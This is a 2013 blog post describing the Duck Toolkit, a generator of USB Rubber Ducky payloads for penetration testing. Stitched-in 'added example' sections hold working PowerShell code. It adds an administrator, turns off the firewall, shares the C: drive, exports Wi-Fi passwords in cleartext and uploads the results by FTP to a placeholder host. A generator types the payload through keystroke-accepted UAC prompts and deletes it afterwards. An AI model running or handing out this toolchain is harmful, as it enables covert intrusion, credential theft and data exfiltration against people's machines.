Sunday, 11 August 2013

Duck Toolkit

Website: Duck Toolkit

The aim of the Duck Toolkit project was to create a website that lets users easily build payloads for the Hak5 USB Rubber Ducky for use in a penetration testing engagement.

To achieve this, the site holds scripts for multiple operating systems that can be deployed quickly and quietly against a target computer by the Ducky, which presents itself to the target as a keyboard and types the payload in. The scripts fall into three categories: Reconnaissance, Exploitation and Reporting. Scripts from all three categories can be combined, so the user can assemble a payload suited to their situation. The most important function of the project, however, is not the combining of scripts but the reporting of what was collected from the target. A report is generated from the reconnaissance scripts the user selected and delivered through one of the Reporting methods. The information in these reports ranges from installed software to network details, all of it chosen to be useful in a penetration testing context.

All scripts are written in PowerShell and therefore only work against target machines that have PowerShell installed (Windows 7/8, Windows Server 2008). Administrative access is also required: the attack process below elevates through UAC, so the account the Ducky types into must be allowed to do so.


List of Current Scripts


Reconnaissance Scripts

  • Computer Information: Returns the installed operating system, user names, system uptime, system manufacturer, hard drive size, RAM size and processor information.
  • User Information: Returns the current user name, account type, the user's SID and whether a password is required.
  • Shared Drive Information: Lists all shared drives with their path and description.
  • Installed Program List: Returns installed program names and version numbers.
  • Installed Updates: Returns a list of installed updates with Hot Fix ID, installation date and description.
  • User Document List: Returns a list of documents within the user's home directory, specifically files with .doc, .docx, .pdf and .rar extensions.
  • Basic Network Information: Returns information about installed network cards, the computer's IP address and its MAC address.
  • Network Scan: Scans the network for active hosts in a user-specified range. A list of active hosts is returned along with possible operating system information.
  • Port Scan: Checks the target machine against a list of pre-defined ports and returns those that are open.
  • Copy Wireless Profile: Copies the wireless profiles from the target machine; these contain the passwords for the associated Wi-Fi access points and can be used to connect to those networks.
  • Take Screen Captures: Takes a screen capture every 60 seconds for a user-specified duration.

 

Exploitation Scripts

  • Find and Upload File: Searches the target computer for a specified file; when found, the file is uploaded via FTP. If two or more copies of the file are found, the newest is uploaded.
  • Disable Firewall: Disables the firewall on the target computer.
  • Add Administrative User: Adds a user with administrative rights.
  • Open Firewall Port: Opens a specified firewall port on the target computer.
  • Start Wi-Fi Access Point: Starts a Wi-Fi access point on the target computer with the specified name and password.
  • Share C:\ Drive: Shares the target machine's C:\ drive, and with it every file and folder on it.
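As an added example (not a script from the Duck Toolkit site), the following PowerShell implements the changes listed above in the way a tester would want them: each change is verified after it is made and recorded so that it can be reverted at the end of the engagement. The user name, password, port, SSID and share name are placeholders, and the script must run from an elevated PowerShell, which is how the attack process described later on this page opens it.

```powershell
# Added example, not Duck Toolkit's own script: the exploitation changes listed
# above, each verified after the fact and recorded so they can be reverted at
# the end of the test. User name, password, port, SSID and share name are placeholders.
# Must run elevated.
$undo = New-Object System.Collections.ArrayList   # replayed newest-first by Invoke-Undo

function Add-AdminUser([string]$Name, [string]$Password) {
    # Resolve the local Administrators group from its well-known SID so this also
    # works on localised Windows installs where the group is not named "Administrators".
    $sid   = New-Object System.Security.Principal.SecurityIdentifier 'S-1-5-32-544'
    $group = $sid.Translate([System.Security.Principal.NTAccount]).Value.Split('\')[-1]
    net user $Name $Password /add | Out-Null
    net localgroup $group $Name /add | Out-Null
    [void]$undo.Add("net user $Name /delete")
    return [bool](net localgroup $group | Select-String -SimpleMatch $Name)
}

function Disable-Firewall {
    netsh advfirewall set allprofiles state off | Out-Null
    [void]$undo.Add('netsh advfirewall set allprofiles state on')
    # Verify: the "State" line of every profile must now read OFF
    $states = @(netsh advfirewall show allprofiles state | Select-String '^State')
    return ($states.Count -gt 0) -and (@($states | Where-Object { $_ -notmatch 'OFF' }).Count -eq 0)
}

function Open-FirewallPort([int]$Port) {
    $rule = "DuckToolkit_$Port"   # no spaces, so netsh receives the name as one token
    netsh advfirewall firewall add rule name=$rule dir=in action=allow protocol=TCP localport=$Port | Out-Null
    [void]$undo.Add("netsh advfirewall firewall delete rule name=$rule")
    return [bool](netsh advfirewall firewall show rule name=$rule | Select-String "LocalPort.*$Port")
}

function Start-HostedAP([string]$Ssid, [string]$Key) {
    # Hosted network: the key must be 8-63 characters and the adapter must support it
    netsh wlan set hostednetwork mode=allow ssid=$Ssid key=$Key | Out-Null
    netsh wlan start hostednetwork | Out-Null
    [void]$undo.Add('netsh wlan set hostednetwork mode=disallow')
    [void]$undo.Add('netsh wlan stop hostednetwork')
    return [bool](netsh wlan show hostednetwork | Select-String 'Status\s*:\s*Started')
}

function Share-SystemDrive([string]$ShareName = 'DuckShare') {
    # Quoted so PowerShell hands the comma-containing argument to net.exe intact
    net share "$ShareName=C:\" '/grant:Everyone,FULL' | Out-Null
    [void]$undo.Add("net share $ShareName /delete")
    return [bool](Get-WmiObject Win32_Share -Filter "Name='$ShareName'")
}

function Invoke-Undo {
    # Replay the recorded commands newest-first (stop the AP before disallowing it, etc.)
    for ($i = $undo.Count - 1; $i -ge 0; $i--) { Invoke-Expression $undo[$i] | Out-Null }
    $undo.Clear()
}

# Example run with assumed values; each call returns $true once the change is verified
Add-AdminUser      -Name 'svc_duck' -Password 'Assumed!Pass123'
Disable-Firewall
Open-FirewallPort  -Port 3389
Start-HostedAP     -Ssid 'DuckAP' -Key 'assumedkey123'
Share-SystemDrive
# ... engagement work ...
Invoke-Undo
```

The undo list only lives in memory; if the payload is wiped from the target as the attack process does, write the recorded commands to the report first so the changes can still be reverted after the test.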

 

Reporting Scripts

  • Save to Target Machine: Zip-archives the reconnaissance report and saves it to a user-specified location on the target machine.
  • Upload Report via FTP: Zip-archives the reconnaissance report and uploads it to a user-specified FTP server. Note that FTP is a cleartext protocol, so the credentials and the report itself are exposed to anyone watching the network.
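As an added example (not a script from the Duck Toolkit site), the following PowerShell collects a subset of the reconnaissance items listed in the Reconnaissance Scripts section, then delivers the result through both reporting methods above and cleans up after itself. The report directory, the local save path, and the FTP host and credentials are assumed placeholders. It also assumes PowerShell 3 or later with .NET 4.5 for the ZipFile class, because Compress-Archive did not exist in PowerShell of that era.

```powershell
# Added example, not Duck Toolkit's own script. Gathers a subset of the
# reconnaissance items, zips the result, delivers it (local save and FTP
# upload), then removes what it created on the target.
# Assumed: PowerShell 3+/.NET 4.5 for ZipFile, placeholder FTP host/credentials.
$ErrorActionPreference = 'SilentlyContinue'
$out = Join-Path $env:TEMP ('report_' + $env:COMPUTERNAME)
New-Item -ItemType Directory -Path $out -Force | Out-Null

# Computer Information (Get-WmiObject also exists on PowerShell 2.0)
$os  = Get-WmiObject Win32_OperatingSystem
$cs  = Get-WmiObject Win32_ComputerSystem
$cpu = Get-WmiObject Win32_Processor | Select-Object -First 1
New-Object PSObject -Property @{
    OS           = "$($os.Caption) $($os.Version)"
    LastBoot     = $os.ConvertToDateTime($os.LastBootUpTime)
    Manufacturer = $cs.Manufacturer
    RAM_GB       = [math]::Round($cs.TotalPhysicalMemory / 1GB, 1)
    CPU          = $cpu.Name
    LoggedOnUser = $cs.UserName
} | Format-List | Out-File (Join-Path $out 'computer.txt')

# User Information: name, SID, whether the token is in the Administrators role
$id   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$prin = New-Object System.Security.Principal.WindowsPrincipal($id)
New-Object PSObject -Property @{
    User    = $id.Name
    SID     = $id.User.Value
    IsAdmin = $prin.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)
    PasswordRequired = (Get-WmiObject Win32_UserAccount -Filter "Name='$env:USERNAME' AND LocalAccount=True").PasswordRequired
} | Format-List | Out-File (Join-Path $out 'user.txt')

# Shared Drive Information
Get-WmiObject Win32_Share | Select-Object Name, Path, Description |
    Format-Table -AutoSize | Out-File (Join-Path $out 'shares.txt')

# Installed Program List from the Uninstall registry keys (32- and 64-bit views).
# Deliberately not Win32_Product: querying it is slow and triggers MSI repair actions.
$uninst = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
          'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'
Get-ItemProperty $uninst | Where-Object { $_.DisplayName } |
    Select-Object DisplayName, DisplayVersion | Sort-Object DisplayName -Unique |
    Format-Table -AutoSize | Out-File (Join-Path $out 'programs.txt')

# Installed Updates
Get-HotFix | Select-Object HotFixID, InstalledOn, Description |
    Format-Table -AutoSize | Out-File (Join-Path $out 'updates.txt')

# User Document List
Get-ChildItem $env:USERPROFILE -Recurse -Include *.doc,*.docx,*.pdf,*.rar |
    Select-Object FullName, Length, LastWriteTime |
    Format-Table -AutoSize | Out-File (Join-Path $out 'documents.txt')

# Basic Network Information
Get-WmiObject Win32_NetworkAdapterConfiguration -Filter 'IPEnabled=True' |
    Select-Object Description, MACAddress, @{n='IP'; e={ $_.IPAddress -join ',' }} |
    Format-Table -AutoSize | Out-File (Join-Path $out 'network.txt')

# Copy Wireless Profile: key=clear writes the pre-shared keys in plaintext
# into the exported XML (requires an elevated prompt)
netsh wlan export profile folder="$out" key=clear | Out-Null

# Reporting: zip the directory
$zip = "$out.zip"
Add-Type -AssemblyName System.IO.Compression.FileSystem
[System.IO.Compression.ZipFile]::CreateFromDirectory($out, $zip)

# Save to Target Machine (assumed destination)
Copy-Item $zip 'C:\Windows\Temp\report.zip' -Force

# Upload Report via FTP (assumed server and credentials). FTP is cleartext,
# so the credentials and the whole report cross the network unencrypted.
$ftp = New-Object System.Net.WebClient
$ftp.Credentials = New-Object System.Net.NetworkCredential('duck', 'hunter2')
$ftp.UploadFile("ftp://ftp.example.com/$env:COMPUTERNAME.zip", $zip)

# Clean up: remove everything this script created in the temp directory
Remove-Item $out -Recurse -Force
Remove-Item $zip -Force
```

Note the two choices that matter on a real target: the Uninstall registry keys are read instead of Win32_Product, which is slow and quietly triggers Windows Installer repair actions on every package, and the wireless export uses key=clear, which is what puts the Wi-Fi passwords into the report and is also why the script must run elevated.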


Attack Process

  • A Notepad window is opened with administrative rights
  • The selected scripts are typed out
  • The Notepad file is saved as ‘config.ps1’ in the Windows directory
  • The Notepad window is closed
  • A Command Prompt window is opened with administrative rights and the PowerShell execution policy is set to Unrestricted
  • The PowerShell script is executed from the Command Prompt
  • The Command Prompt window is closed
  • After the script has run, ‘config.ps1’ is erased, as are any other created files
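The steps above are what the Ducky payload has to type. As an added example (not the generator behind the Duck Toolkit site), the following PowerShell script, run on the attacker's machine, turns a PowerShell payload file into a Ducky Script that follows that sequence, ready for the Hak5 encoder. The file names, the delays, a US keyboard layout, Windows 7/8 with a UAC prompt that ALT y accepts, and a logged-on user who is allowed to elevate are all assumptions.

```powershell
# Added example, not Duck Toolkit's own generator: converts a PowerShell payload
# into a Ducky Script that follows the attack process above. Run on the
# attacker's machine. Assumed: US keyboard layout, Windows 7/8 with UAC
# prompting (ALT y accepts it), a logged-on user who can elevate, and delays
# that will need tuning per target.
param(
    [string]$Payload = '.\recon.ps1',             # the selected scripts, concatenated
    [string]$Out     = '.\inject.txt',            # Ducky Script for the encoder
    [string]$Target  = 'C:\Windows\config.ps1'    # where the attack process saves it
)

$ducky = New-Object System.Collections.ArrayList
function Emit([string[]]$Lines) { foreach ($l in $Lines) { [void]$ducky.Add($l) } }

function Open-Elevated([string]$Command) {
    # Run dialog, then CTRL-SHIFT ENTER launches the program as administrator;
    # ALT y accepts the UAC consent prompt.
    @('GUI r', 'DELAY 500', "STRING $Command", 'CTRL-SHIFT ENTER', 'DELAY 1000', 'ALT y', 'DELAY 1500')
}

Emit 'REM Generated Ducky Script following the Duck Toolkit attack process'
Emit 'DEFAULT_DELAY 100'
Emit 'DELAY 2000'   # give Windows time to enumerate the Ducky as a keyboard

# Steps 1-2: open Notepad with administrative rights and type the selected scripts.
Emit (Open-Elevated 'notepad')
$lines = @(Get-Content $Payload)
# Step 8: the final line makes the script delete itself, so no extra keystrokes are needed.
$lines += 'Remove-Item -Force $MyInvocation.MyCommand.Path'
foreach ($line in $lines) {
    if ($line.Trim()) { Emit "STRING $line" }   # STRING types the text literally
    Emit 'ENTER'
}

# Steps 3-4: save as config.ps1 in the Windows directory (the quotes stop Notepad
# appending .txt), then close Notepad.
Emit @('CTRL s', 'DELAY 500', "STRING `"$Target`"", 'ENTER', 'DELAY 500', 'ALT F4')

# Steps 5-7: elevated Command Prompt, set the execution policy, run the script,
# close the window once the script returns.
Emit (Open-Elevated 'cmd')
Emit @('STRING powershell -Command "Set-ExecutionPolicy Unrestricted -Force"', 'ENTER', 'DELAY 1000')
Emit @("STRING powershell -File $Target & exit", 'ENTER')

Set-Content -Path $Out -Value $ducky
```

The resulting inject.txt is encoded with the Hak5 encoder (java -jar duckencoder.jar -i inject.txt -o inject.bin) and copied to the Ducky's SD card. Two points a tester should keep in mind: every line of the payload is typed visibly on screen, so a long script is slow and hard to miss, and Set-ExecutionPolicy Unrestricted is written to the registry and survives the cleanup in step 8; running the script with powershell -ExecutionPolicy Bypass -File instead leaves no such change behind.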


Screen Shots


(Screenshots not reproduced; captions only.)

  • Script Selection
  • Variable Input
  • Language Selection
  • Script Download
  • Reconnaissance Report (three screenshots)



Future Plans

  • Improve the Network Scan output with a visual map of the network and operating system information
  • Include a Base64 encoding tool for executable files under 5 MB in size. The Base64-encoded string will be combined with the code needed to reassemble and execute it on the target machine.
  • Support more operating systems, specifically Ubuntu Linux.
  • Optimise the current scripts